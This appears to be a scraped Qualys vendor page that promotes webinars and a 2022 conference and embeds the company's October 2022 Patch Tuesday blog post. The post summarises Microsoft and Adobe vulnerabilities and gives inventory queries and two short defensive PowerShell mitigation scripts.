At Qualys Inc, providing cybersecurity through technology is what we do. Join us each month as we tap into the minds of Qualys experts to share how you can get the most out of your investment and understand ways in which you can quickly reduce your cyber risk exposure using the Qualys Cloud Platform. Each 45-minute monthly session, hosted on the first Wednesday of the month, will showcase practical hands-on tips and tricks, news on new capabilities and services, as well as useful customer success stories that can help you get the most out of the Qualys Cloud Platform.
**Join us for the first Workshop Wednesday on Nov 2, 2022, at 9:00 AM PDT.**
[Subscribe Now](<https://gateway.on24.com/wcc/eh/3347108/category/111238/workshop-wednesday>)
* * *
## Qualys Threat Thursdays
[Subscribe Now](<https://gateway.on24.com/wcc/eh/3347108/category/111445/threat-thursday>)
The Qualys Threat Research team invites you to join their regular monthly webinar series covering the latest threat intelligence analysis and insight.
The October 2022 Threat Thursday topic is **AsyncRAT**.
Never miss an update. [Subscribe Today](<https://gateway.on24.com/wcc/eh/3347108/category/111445/threat-thursday>)!
[Click Here](<https://tinyl.io/79BC>) to quickly navigate to Qualys Threat Thursday blog posts.
* * *
## [**CONFERENCES**](<https://www.qualys.com/qsc/locations/>)
[Register Now](<https://www.qualys.com/qsc/2022/las-vegas/register/>)
## [Qualys Annual Security Conference](<https://tinyl.io/79BB>) #QSC22
Qualys Security Conference (QSC) is a unique opportunity for the Qualys community to get together to hear the latest developments in cybersecurity, view the latest innovations from Qualys, trade best practices, share feedback, and learn tips and tricks on how security professionals work to keep their organizations secure.
## We are pleased to announce the keynote speaker for the 2022 Qualys Annual Security Conference in Las Vegas

Robert Herjavec is a globally recognized motivational, business, and cybersecurity leader. For the last 14 years, Robert has been well known as one of the Sharks and an executive producer of the Emmy Award-winning hit show Shark Tank. He has served as a Cybersecurity Advisor for the Government of Canada, participated in the White House Summit on Cybersecurity, and is a member of the US Chamber of Commerce Task Force for Cybersecurity.
Robert’s keynote will highlight the growing importance of cybersecurity in today’s world.
* * *
**Explore and secure the digital journey.** Dive into the profound impact of the digital journey and explore how to build security automation from the data center to the cloud. Industry experts and Qualys leaders discuss automation strategies, preview product roadmaps, listen to your challenges, and answer your questions.
**Get inspired.** Engage with Qualys’ customer-facing teams and your peers around best practices and user case studies for applying security automation to real-world challenges.
**Sharpen your expertise.** Two days of free training cover forward-looking strategies, best practices to improve effectiveness and productivity, and core/expanded product features to up-level your security program.
**Who Should Attend?** CIOs, CSOs, and CTOs; directors and managers of network, security, and cloud; developers and DevSecOps practitioners; Qualys partners and consultants; or any forward-thinking security professional.
## Live **Training Sessions**
## [November 7](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821#nov7>) and [November 8](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821#nov8>)
* * *
## Live **Conference Sessions**
## [November 9](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821#nov9>) and [November 10](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821#nov10>)
_Attendance at QSC is complimentary. This includes access to all general sessions, breakout sessions, breakfast, lunch, breaks, and receptions._
* * *
#### #QSC22 Location and Reservation Information
November 7-10, 2022
The Venetian Resort Las Vegas, 3355 Las Vegas Blvd. South, Las Vegas, NV 89109, US
[Book your hotel here](<https://book.passkey.com/gt/218594637?gtid=9914abda1b2fe722d872e0ac3e0bdc09>) & take advantage of the discounted QSC rate of $229+ per night
Or find a conference [near you](<https://www.qualys.com/qsc/locations/>).
* * *
## This month's blog content is the result of collaboration with and contributions from:
_In order of appearance_
* Quote: [Ankit Malhotra](<https://blog.qualys.com/author/amalhotra>), Manager, Signature Engineering
* Quote: [Saeed Abbasi](<https://blog.qualys.com/author/sabbasi>), Manager, Vulnerability Signatures
* QID Content: Arun Kethipelly, Manager, Signature Engineering
* QID Content: Dianfang (Sabrina) Gao, Lead, QA Engineer
* CAR Content: Mukesh Choudhary, Compliance Research Analyst
* CAR Content: [Lavish Jhamb](<https://blog.qualys.com/author/ljhamb>), Solution Architect, Compliance Solutions
* PC Content: Xiaoran (Alex) Dong, Manager, Compliance Signature Engineering
* Webinars: Thomas Nuth, Senior Director, Product Marketing
* Webinars: Nihal Adav, Email Marketing Specialist
* #QSCLV22 Content: Anna Moraleda, Sr. Marketing Events Specialist
* * *
{"id": "QUALYSBLOG:F062F85432853297A014064EA7A5C183", "vendorId": null, "type": "qualysblog", "bulletinFamily": "blog", "title": "October 2022 Patch Tuesday | Microsoft Releases 84 Vulnerabilities with 13 Critical, plus 12 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 29 Vulnerabilities with 17 Critical.", "description": "* * *\n\n# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 84 vulnerabilities (aka flaws) in the October 2022 update, including 13 vulnerabilities classified as **_Critical_** as they allow Elevation of Privilege (EoP), Remote Code Execution (RCE), and Spoofing. This month's Patch Tuesday fixes two (2) zero-day vulnerabilities, with one (1) actively exploited***** in attacks ([CVE-2022-41033](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41033>)*****,[ ](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30134>)[CVE-2022-41043](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41043>)). Earlier this month, on October 3 and 6, 2022, Microsoft also released a total of 12 Microsoft Edge (Chromium-Based) updates, one (1) addressing Spoofing ([CVE-2022-41035](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41035>)) ranked _**Moderate**_.\n\nMicrosoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege (EoP), Information Disclosure, Remote Code Execution (RCE), Security Feature Bypass, Spoofing, Microsoft Edge (Chromium-based), and Microsoft Edge (Chromium-based) / Spoofing.\n\n# Microsoft Exchange _"**ProxyNotShell"**_** **Zero-Days Not Yet Addressed _(QID 50122)_\n\nUnfortunately, Microsoft has not released security updates to address **_ProxyNotShell_** which includes [two actively exploited zero-day vulnerabilities](<https://blog.qualys.com/vulnerabilities-threat-research/2022/09/30/qualys-response-to-proxynotshell-microsoft-exchange-server-zero-day-threat-using-qualys-platform>) tracked as 
[CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) and [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>). \n\n[Released: October 2022 Exchange Server Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-october-2022-exchange-server-security-updates/ba-p/3646263>) provides the following update:\n\n> **NOTE** The October 2022 SUs **_do not_** contain fixes for the zero-day vulnerabilities reported publicly on September 29, 2022 (CVE-2022-41040 and CVE-2022-41082). Please [see this blog post](<https://techcommunity.microsoft.com/t5/exchange-team-blog/customer-guidance-for-reported-zero-day-vulnerabilities-in/ba-p/3641494>) to apply mitigations for those vulnerabilities. We will release updates for CVE-2022-41040 and CVE-2022-41082 when they are ready.\n\n[Ankit Malhotra](<https://blog.qualys.com/author/amalhotra>), Manager, Signature Engineering suggests, "It's worth noting that Microsoft has had to revise the mitigation for [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) more than once, as the suggested URL rewrite Mitigation was bypassed multiple times. 
Organizations that reacted to the ProxyShell vulnerability should also pay close attention to this, taking their lessons learned on rapid remediation, as this vulnerability can potentially see increased exploitation."\n\n* * *\n\n[](<https://tinyl.io/79AH>)\n\n**[ProxyNotShell: Microsoft Exchange Server Zero-Day Threat Using Qualys VMDR](<https://tinyl.io/79AH>)** | [QUALYS ON-DEMAND WEBINAR](<https://tinyl.io/7A58>)\n\n[Watch Now](<https://tinyl.io/79AH>)\n\n[**Qualys Response to _ProxyNotShell_ Microsoft Exchange Server Zero-Day Threat Using Qualys Cloud Platform**](<https://tinyl.io/79AJ>) | [QUALYS BLOG](<https://blog.qualys.com/?>)\n\n* * *\n\n## **The October 2022 Microsoft Vulnerabilities are classified as follows:**\n\n[Microsoft Exploitability Index](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>) / [Microsoft Security Update Severity Rating System](<https://www.microsoft.com/en-us/msrc/security-update-severity-rating-system>)\n\n* * *\n\n## Two (2) **Zero-Day Vulnerabilities Addressed**\n\nA vulnerability is classified as a **_zero-day_** if it is publicly disclosed or actively exploited with no official fix available.\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41033>)[CVE-2022-41033](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41033>) | Windows COM+ Event System Service Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nClassified as **_Critical_**, this issue affects an unknown function of the component COM+ Event System Service. The impact of exploitation is loss of confidentiality, integrity, and availability.\n\nMicrosoft has not disclosed how the vulnerability is being exploited or if it is being exploited in targeted or more widespread attacks. 
They only say that the attack complexity is low and that it requires no user interaction for the attacker to be able to achieve SYSTEM privileges.\n\nAn attacker who successfully exploited this vulnerability could gain SYSTEM privileges.\n\nPatch Installation should be considered **_Critical_**.\n\n[Saeed Abbasi](<https://blog.qualys.com/author/sabbasi>), Manager, Vulnerability Signatures adds, "This patch fixes a security vulnerability that Microsoft stated is under active attack. However, it is not clear how severe these attacks are. Due to the nature of this vulnerability, a privilege escalation that often engages some social engineering (e.g. requiring the user to open a malicious attachment), history shows that it potentially needs to be chained with a code execution bug to exploit."\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_**\n\n* * *\n\n### [CVE-2022-41043](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41043>)| Microsoft Office Information Disclosure Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 3.3/10.\n\nThe type of information that could be disclosed if an attacker successfully exploited this vulnerability is user tokens and other potentially sensitive information. The impact of exploitation is loss of confidentiality.\n\nThis vulnerability demands that the victim is doing some kind of user interaction. 
As of the time of publishing, neither technical details nor an exploit is publicly available.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): _**Exploitation Less Likely**_\n\n* * *\n\n## **Microsoft Critical Vulnerability Highlights**\n\n### **[](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37968>)[CVE-2022-37968](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37968>) |** Azure Arc-enabled Kubernetes cluster Connect Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of** **10/10.\n\nMicrosoft has identified a vulnerability affecting the cluster connect feature of Azure Arc-enabled Kubernetes clusters. This vulnerability could allow an unauthenticated user to elevate their privileges and potentially gain administrative control over the Kubernetes cluster. Additionally, because Azure Stack Edge allows customers to deploy Kubernetes workloads on their devices via Azure Arc, Azure Stack Edge devices are also vulnerable to this vulnerability.\n\nCustomers using Azure Stack Edge must update to the 2209 release (software version 2.2.2088.5593). 
Release notes for the 2209 release of Azure Stack Edge can be found here: [Azure Stack Edge 2209 release notes](<https://learn.microsoft.com/en-us/azure/databox-online/azure-stack-edge-gpu-2209-release-notes>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-37976](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37976>)** |** Active Directory Certificate Services Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of** **8.8/10.\n\nA malicious DCOM client could coerce a DCOM server to authenticate to it through the Active Directory Certificate Service (ADCS) and use the credential to launch a cross-protocol attack.\n\nAn attacker who successfully exploited this vulnerability could gain domain administrator privileges.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-41038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41038>)** |** Microsoft SharePoint Server Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of** **8.8/10.\n\nIn a network-based attack, an authenticated attacker with Manage List permissions could execute code remotely on the SharePoint Server.\n\nThe attacker must be authenticated to the target site, with permission to use Manage Lists within SharePoint.\n\n**NOTE**: Customers running SharePoint Server 2013 Service Pack 1 can install the cumulative update or the security update, which is the same update as for Foundation Server 2013.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n### [CVE-2022-38048](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38048>)** |** Microsoft Office Remote Code Execution (RCE) Vulnerability\n\nThis 
vulnerability has a CVSSv3.1 score of** **7.8/10.\n\nThe word **_Remote_** in the title refers to the location of the attacker. This type of exploit is sometimes referred to as Arbitrary Code Execution (ACE). The attack itself is carried out locally.\n\nWhen a particular vulnerability allows an attacker to execute "arbitrary code", it typically means that the bad guy can run any command on the target system the attacker chooses. [_Source_](<https://tinyl.io/7A6M>)\n\nFor example, when the score indicates that the _Attack Vector_ is _Local_ and _User Interaction_ is _Required_, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer. The impact of exploitation is loss of confidentiality, integrity, and availability.\n\n**NOTE**: Customers should apply all updates offered for the software installed on their systems. If multiple updates apply, they can be installed in any order.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n### [CVE-2022-34689](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34689>)** |** Windows CryptoAPI Spoofing Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of** **7.5/10.\n\nAn attacker could manipulate an existing public x.509 certificate to spoof their identify and perform actions such as authentication or code signing as the targeted certificate.\n\nThe technical details are unknown, and an exploit is not publicly available. 
The impact is known to affect integrity.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n## **Microsoft Release Summary**\n\nThis month\u2019s [Release Notes](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Oct>) cover multiple Microsoft product families, including Azure, Browser, Developer Tools, Extended Security Updates [(ESU)](<https://docs.microsoft.com/en-us/lifecycle/faq/extended-security-updates>), Microsoft Office, System Center, and Windows.\n\nA total of 78 unique Microsoft products/versions are affected, including but not limited to .NET and .NET Core, Azure Arc-enabled Kubernetes cluster, Azure Service Fabric Explorer, Azure Stack Edge, Azure StorSimple 8000 Series, Jupyter Extension for Visual Studio Code, Microsoft 365 Apps for Enterprise, Microsoft Edge (Chromium-based), Microsoft Malware Protection Engine, Microsoft Office, Microsoft SharePoint Enterprise Server, Microsoft SharePoint Foundation, Microsoft SharePoint Server, Microsoft Visual Studio, Visual Studio and Visual Studio Code, Windows Desktop, and Windows Server.\n\nDownloads include Cumulative Updates, Monthly Rollups, Security Only, and Security Updates.\n\n* * *\n\n## **Microsoft Edge | Last But Not Least**\n\nEarlier in October 2022, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities including [CVE-2022-41035](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41035>). The vulnerability assigned to the CVE is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. 
For more information, please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>).\n\n### **[](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41035>)[CVE-2022-41035](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41035>)** **| Microsoft Edge (Chromium-based) Spoofing Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.3/10.\n\nIn a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file that is designed to exploit the vulnerability. However, an attacker would have no way to force the user to visit the website. Instead, an attacker would have to convince the user to click a link, typically by way of an enticement in an email or Instant Messenger message, and then convince the user to open the specially crafted file.\n\n[Per Microsoft severity guidelines](<https://www.microsoft.com/en-us/msrc/bounty-new-edge>), the amount of user interaction or preconditions required to allow this sort of exploitation downgraded the severity. The CVSS scoring system doesn't allow for this type of nuance. **Severity: _Moderate_**\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n_Did you know? Microsoft Security Response Center (MSRC) | [Improvements in Security Update Notifications Delivery \u2013 And a New Delivery Method](<https://tinyl.io/7A6i>). _\n\n* * *\n\n# **Adobe Security Bulletins and Advisories**\n\nAdobe released four (4) [security bulletins and advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 29 vulnerabilities affecting Adobe ColdFusion, Adobe Reader, Adobe Commerce, and Adobe Dimension applications. 
Of these 29 vulnerabilities, 17 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, ten (10) are rated as Important and two (2) are rated as **_[Moderate](<https://helpx.adobe.com/security/severity-ratings.html>)_**; ranging in severity from a CVSS score of 4.4/10 to 10/10, as summarized below.\n\n\n\n* * *\n\n### [APSB22-42](<https://helpx.adobe.com/security/products/coldfusion/apsb22-44.html>)** | **Security updates available for Adobe ColdFusion\n\nThis update resolves six (6) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, six (6) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>), _**and one (1) **_[Moderate](<https://helpx.adobe.com/security/severity-ratings.html>)_** vulnerability.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released security updates for ColdFusion versions 2021 and 2018. These updates resolve [Critical](<https://helpx.adobe.com/security/severity-ratings.html>), [Important](<https://helpx.adobe.com/security/severity-ratings.html>), and [Moderate](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities that could lead to arbitrary code execution, arbitrary file system write, security feature bypass, and privilege escalation.\n\n* * *\n\n### [APSB22-46](<https://helpx.adobe.com/security/products/acrobat/apsb22-46.html>)** | **Security update available for Adobe Acrobat and Reader\n\nThis update resolves two (2) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_** vulnerabilities.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. 
These updates address [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to application denial-of-service and memory leak.\n\n* * *\n\n### [APSB22-48](<https://helpx.adobe.com/security/products/magento/apsb22-48.html>)** | **Security update available for Adobe Commerce\n\nThis update resolves two (2) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_** vulnerabilities.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe Commerce and Magento Open Source. This update resolves a [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability. Successful exploitation could lead to arbitrary code execution. \n\n* * *\n\n### [APSB22-57](<https://helpx.adobe.com/security/products/dimension/apsb22-57.html>)** | **Security updates available for Adobe Dimension\n\nThis update resolves eight (8) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and one (1) **_[Moderate](<https://helpx.adobe.com/security/severity-ratings.html>)_** vulnerability.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Dimension. This update addresses [critical ](<https://helpx.adobe.com/security/severity-ratings.html>)and [moderate](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak in the context of the current user. 
\n\n* * *\n\n# **About Qualys Patch Tuesday**\n\nQualys Patch Tuesday QIDs are published as [Security Alerts](<https://www.qualys.com/research/security-alerts/>) typically late in the evening on the day of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed later by the publication of the monthly queries for the [Unified Dashboard: 2022 Patch Tuesday (QID Based) Dashboard](<https://success.qualys.com/discussions/s/article/000006821>) by Noon on Wednesday.\n\n* * *\n\n## Qualys Threat Research Blog Posts **_New_**\n\nPublished in the Last 30 days; Most Recent First\n\n * [NSA Alert: Topmost CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors](<https://tinyl.io/79AX>)\n * [Qualys Response to ProxyNotShell Microsoft Exchange Server Zero-Day Threat Using Qualys Cloud Platform](<https://tinyl.io/79Aa>)\n\n* * *\n\n## **Qualys [Threat Protection](<https://www.qualys.com/apps/threat-protection/>) High-Rated Advisories**\n\nPublished between September 14 - October 12, 2022, Most Recent First\n\n * [Microsoft Patch Tuesday, October 2022 Edition: 84 Vulnerabilities patched including 12 Microsoft Edge (Chromium-Based), 2 Zero-days, and 13 Rated as Critical](<https://tinyl.io/79Vx>)\n * [Zimbra Collaboration Suite Remote Code Execution Vulnerability (CVE-2022-41352)](<https://tinyl.io/797N>)\n * [FortiGate and FortiProxy Authentication Bypass Vulnerability on Administrative Interface (HTTP/HTTPS) (CVE-2022-40684)](<https://tinyl.io/797M>)\n * [Microsoft Exchange Server Zero-day Vulnerabilities (CVE-2022-41040 and CVE-2022-41082) (ProxyNotShell)](<https://tinyl.io/797L>)\n * [Sophos Firewall Remote Code Execution Vulnerability (CVE-2022-3236)](<https://tinyl.io/797K>)\n * [Zoho ManageEngine PAM360, Access Manager Plus, and Password Manager Pro Remote Code Execution Vulnerability (CVE-2022-35405)](<https://tinyl.io/797J>)\n * [Trend Micro Patches Multiple Vulnerabilities in Apex One (On-Premise) Including One Zero-day 
(CVE-2022-40139)](<https://tinyl.io/797I>)\n * [Cisco Patched Multiple Vulnerabilities in Multiple Products including NVIDIA Data Plane Development Kit](<https://tinyl.io/797H>)\n * [Apple Patches Multiple Vulnerabilities in macOS Big Sur and macOS Monterey including One Zero-day (CVE-2022-32894)](<https://tinyl.io/797G>)\n * [Microsoft Patches Vulnerabilities 79 including 16 Microsoft Edge (Chromium-Based); with 2 Zero-days and 5 Critical in Patch Tuesday, September 2022 Edition](<https://threatprotect.qualys.com/2022/09/14/microsoft-patches-vulnerabilities-79-including-16-microsoft-edge-chromium-based-with-2-zero-days-and-5-critical-in-patch-tuesday-september-2022-edition/>)\n\n* * *\n\n# **Discover and Prioritize Vulnerabilities in **[Vulnerability Management Detection Response](<https://www.qualys.com/apps/vulnerability-management-detection-response/>)** **(VMDR)\n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB). 
\n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`91949` OR qid:`91950` OR qid:`91951` OR qid:`91953` OR qid:`110417` OR qid:`110418` OR qid:`377627` OR qid:`377628` ) \n\n\n\n [In-Depth Look Into Data-Driven Science Behind Qualys TruRisk](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>) **_New_**\n\n [Qualys VMDR Recognized as Best VM Solution by SC Awards 2022 & Leader by GigaOm](<https://blog.qualys.com/product-tech/2022/08/22/qualys-vmdr-recognized-as-best-vm-solution-by-sc-awards-2022-leader-by-gigaom>)\n\n [A Deep Dive into VMDR 2.0 with Qualys TruRisk\u2122](<https://blog.qualys.com/product-tech/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>)\n\n* * *\n\n# **Rapid Response with **[Patch Management](<https://www.qualys.com/apps/patch-management/>) (PM)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. 
You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches with one click.\n\nThe following QQL will return the missing patches for this Patch Tuesday:\n \n \n ( qid:`91949` OR qid:`91950` OR qid:`91951` OR qid:`91953` OR qid:`110417` OR qid:`110418` OR qid:`377627` OR qid:`377628` )\n\n\n\n [Why Organizations Struggle with Patch Management (and What to Do about It)](<https://tinyl.io/79TY>) **_New_**\n\n [Let Smart Automation Reduce the Risk of Zero-Day Attacks on Third-Party Applications](<https://blog.qualys.com/qualys-insights/2022/09/08/let-smart-automation-reduce-the-risk-of-zero-day-attacks-on-third-party-applications-2>)\n\n [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n* * *\n\n# EXECUTE Mitigation Using [Custom Assessment and Remediation](<https://tinyl.io/79UY>) (CAR) **_New_**\n\n[Qualys Custom Assessment and Remediation](<https://www.qualys.com/apps/custom-assessment-remediation/>) empowers a system administrator to quickly and easily perform configuration updates on your technology infrastructure when the current situation requires the implementation of a vendor-suggested mitigation or workaround. \n\n**_Mitigation_** refers to a setting, common configuration, or general best practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability.\n\nA **_workaround_** is a method, sometimes used temporarily, for achieving a task or goal when the usual or planned method isn't working. Information technology often uses a workaround to overcome hardware, programming, or communication problems. Once a problem is fixed, a workaround is usually abandoned. 
[_Source_](<https://www.techtarget.com/whatis/definition/workaround>)\n\n## Try It for Free!\n\n[Sign up now for a no-cost trial of Qualys Custom Assessment and Remediation](<https://www.qualys.com/forms/custom-assessment-remediation/>)\n\nCustomers can perform the provided mitigation steps by creating a PowerShell script and executing the script on vulnerable assets.\n\n**IMPORTANT: ** Scripts tend to change over time. Referring back to a portion of our quote from [Ankit Malhotra](<https://blog.qualys.com/author/amalhotra>) at the top of this blog, "It's worth noting that Microsoft has had to revise the mitigation for [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) more than once, as the suggested URL rewrite Mitigation was bypassed multiple times." **_Please refer to the Qualys GitHub Tuesday Patch [link](<https://github.com/Qualys/Custom-Assessment-and-Remediation-Script-Library/tree/main/Tuesday%20Patch>) to ensure the most current version of a given [Patch Tuesday script](<https://github.com/Qualys/Custom-Assessment-and-Remediation-Script-Library/tree/main/Tuesday%20Patch>) is in use._**\n\n### Related Blog Content:\n\nPublished in the Last 30 days; Most Recent First\n\n [Zimbra Collaboration Suite Remote Code Execution Vulnerability (CVE-2022-41352)](<https://tinyl.io/797N>)\n\n [Remediate Your Vulnerable Lenovo Systems with Qualys Custom Assessment and Remediation](<https://tinyl.io/79Y9>)\n\n### [**CVE-2022-37976**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37976>)** | **Active Directory Certificate Services Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n[**GitHub Link for CVE-2022-37976 
Script**](<https://github.com/Qualys/Custom-Assessment-and-Remediation-Script-Library/tree/main/Tuesday%20Patch/2022/October/CVE-2022-37976\\(ADCS%20Vulnerability\\)>)\n \n \n $ServiceName = \"CertSvc\"\n $ServiceStatus = (Get-Service -Name $ServiceName).status\n if($ServiceStatus -eq \"Running\")\n {\n \n reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Ole\\\" /v LegacyAuthenticationLevel /t REG_DWORD /d '5' /f | Out-Null\n \n if($?)\n {\n Write-Host \"ADCS found running. LegacyAuthenticationLevel is set to 5. Mitigation for CVE-2022-37976 has been applied as per MSRC guidelines. \"\n }\n else\n {\n Write-Host \"command failed\"\n }\n \n \n }\n else {\n Write-Host \"ADCS not running. No action required\"\n }\n\n\n\n* * *\n\n### [CVE-2022-33645](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33645>)** | **Windows TCP/IP Driver Denial of Service (DoS) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.5/10.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n[**GitHub Link for CVE-2022-33645 Script**](<https://github.com/Qualys/Custom-Assessment-and-Remediation-Script-Library/tree/main/Tuesday%20Patch/2022/October/CVE-2022-33645\\(TCPIP%20Driver%20Dos%20Vulnerability\\)>)\n \n \n Disable-NetAdapterBinding -Name \"*\" -ComponentID \"ms_tcpip6\"\n \n if($?)\n {\n Write-Host \"IPV6 has been disabled as part of workaround implementation. CVE-2022-33645 is now mitigated,\"\n }\n else\n {\n Write-Host \"command failed\"\n }\n \n\n\n\n* * *\n\n# **EVALUATE Vendor-Suggested Mitigation with **[**Policy Compliance**](<https://www.qualys.com/forms/policy-compliance/>) (PC)\n\n[Qualys Policy Compliance Control Library](<https://vimeo.com/700790353>) makes it easy to evaluate your technology infrastructure when the current situation requires implementation validation of a vendor-suggested mitigation or workaround. 

**_Mitigation_** refers to a setting, common configuration, or general best practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability.

